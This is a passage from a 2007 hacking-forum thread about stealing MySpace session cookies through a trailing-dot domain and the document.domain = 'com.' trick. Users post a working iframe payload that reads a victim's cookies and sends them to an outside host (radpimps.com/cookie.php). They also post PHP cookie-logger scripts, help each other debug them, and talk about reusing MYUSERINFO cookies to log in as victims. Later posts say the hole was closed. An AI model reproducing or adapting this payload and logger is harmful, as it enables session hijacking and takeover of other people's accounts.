Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous12
Current Page: 2 of 2
Re: MySpace's "domain generalization"
Posted by: Royal2000H
Date: April 15, 2007 02:29AM

142TeeTH Wrote:
-------------------------------------------------------
> @Royal2000H,
> hm, could of sworn i typed it correctly.
> however, it seems to work perfect with me.
>
> and yea, MYUSERINFO logs you in.
> shame IE doesn't store it the way that's
> productive to, persay, us. ^_^


use the cookie to it's fullest

I realized after a few days it won't work anymore and you'll need a new MYUSERINFO

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: Anonymous User
Date: May 05, 2007 09:10AM

i dont even know how to do it
when i try to copy/paste, it will only copy the javascript part
how exactly do you use that code to do it? even if it doesnt work, how would you use it? sry, im kinda a noob on this kinda stuff, i havent learned much about any kind of myspace exploit but im trying to get into them now

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: rsnake
Date: May 08, 2007 07:52PM

halo2master15 - this isn't something you put into Myspace, this is something you put on a different domain.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: mhd1283
Date: May 15, 2007 03:25PM

I am not able to set my domain to 'com.' I get this error: Illegal document.domain value code 1009

Any ideas?

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: trev
Date: May 15, 2007 03:56PM

This trailing dot has to be in your URL of course. Like http://site.com./

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: mhd1283
Date: May 15, 2007 10:38PM

Of course. That just made way too much sense. Man sometimes I do some stupid things.

Thanks!

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: johnsonsmith1
Date: May 21, 2007 11:54PM

I tried this but I cant get it to log any cookies in my cookielog.txt file

Here is the page with the iframe:

http://www.freewebs.com/injurylawyer1/homepage.html

and the source code

<script type="text/javascript">
document.domain = "com.";
</script>
<iframe src="http://home.myspace.com./" onload="stolenc = escape(frames[0].document.cookie); document.location='http://radpimps.com/cookie.php?cookie='+stolenc;"></iframe>


and the source code for the actual cookie logger

<?php
chmod ("cookie.php", 777);
$cookie = $HTTP_GET_VARS["cookie"];
$ip = getenv ('REMOTE_ADDR');
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
header ("Location: /index.php"); //
?>

I cant get cookies form myspace to show up in the log

Options: ReplyQuote
Re: MySpace's "domain generalization"
Date: May 22, 2007 12:14AM

try...

<?php

$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $ip . "\n" . $cookie . "\n\n");
header('Location: /index.php');

?>

btw have you checked to see if the JS properly sent the cookie via GET? you should do an echo $_GET['cookie'] to see, remove the header() redirection when doing that of course.

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: johnsonsmith1
Date: May 23, 2007 12:13PM

It isnt getting the cookie not working

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: Royal2000H
Date: May 26, 2007 05:40AM

try this in your html file
(instead of your current iframe)
that's how mine is and it works fine....

<iframe src="http://home.myspace.com./" onload="stolenc = escape(frames[0].document.cookie); document.location='http://radpimps.com/cookie.php?cookie='+(stolenc)"></iframe>

also, make sure you have a cookielog.txt
sounds simple enough, but sometimes forgotten

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: infamous
Date: May 27, 2007 04:47PM

<?php

$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $ip . "\n" . $cookie . "\n\n");
header('Location: /index.php');

?>

i tryed that ,i only get the ip sent to me not the cookie

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: flameboy
Date: July 20, 2007 03:48PM

firefox just added httponly cookie support.
this wont work much anymore

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: bubbles
Date: July 21, 2007 09:13PM

Still works on 75% of the browser market. More so on myspace specifically probably.

-bubbles
http://webmastertutorials.net

Options: ReplyQuote
Re: MySpace's "domain generalization"
Date: September 26, 2007 11:32AM

It appears Myspace is invincible anymore (aside from some serious low level language trick). Would you agree?

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: sarahsarah
Date: September 29, 2007 05:32PM

im going to need some help with something like this. or the changing the persons name thing.

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: trev
Date: February 18, 2008 04:12AM

Yes, Myspace fixed the issue - if I try to open it with a trailing dot it simply redirects to Google. Also, Firefox 3 won't let you use that trick any more (bug 368700 and bug 368702).

Options: ReplyQuote
Pages: Previous12
Current Page: 2 of 2


Sorry, only registered users may post in this forum.